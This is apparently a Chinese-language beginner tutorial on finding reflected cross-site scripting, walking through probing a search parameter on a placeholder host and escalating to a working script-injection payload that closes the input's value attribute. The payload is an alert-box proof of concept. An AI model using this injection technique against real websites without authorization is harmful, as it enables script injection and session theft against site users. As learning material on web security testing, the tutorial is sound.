xss学习之查找xss（一）

从本章开始学习xss

如何查找xss：

拿到一个网站之后，随便找一个页面测试下

http://xss.com/product/product_searchProducts.action?productName=111

查看页面源代码为：

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111"/>

添加一些变形，随便写（这里主要是看页面时如何构造语句的）：

把111变为：  111'</a

http://xss.com/product/product_searchProducts.action?productName=111'</a

源代码：

 

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111'</a"/>

可以看到111前面有个" 在/a后面还有”  这个是系统自动加的，然后系统自动增加了 />

构造xss为：首先闭合掉最开头的< 需要提交参数的时候先使用> 闭合掉

尝试提交 111><script>alert('a')</script>

源代码：

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111><script>alert('a')</script>"/>

可以看到在</script>之后自动添加了"/>

这个”是跟提交数据一起的，也需要在一开始就闭合

尝试： 111"><script>alert('a')</script>

源代码：

<input id="productName" name="productName" class="search_text" type="text" onfocus="javascript:jq(this).val('');"  value="111"><script>alert('a')</script>"/>

此时前面该闭合的都已经闭合了，最后留下了xss代码执行成功，会弹出一个对话框，内容为“a”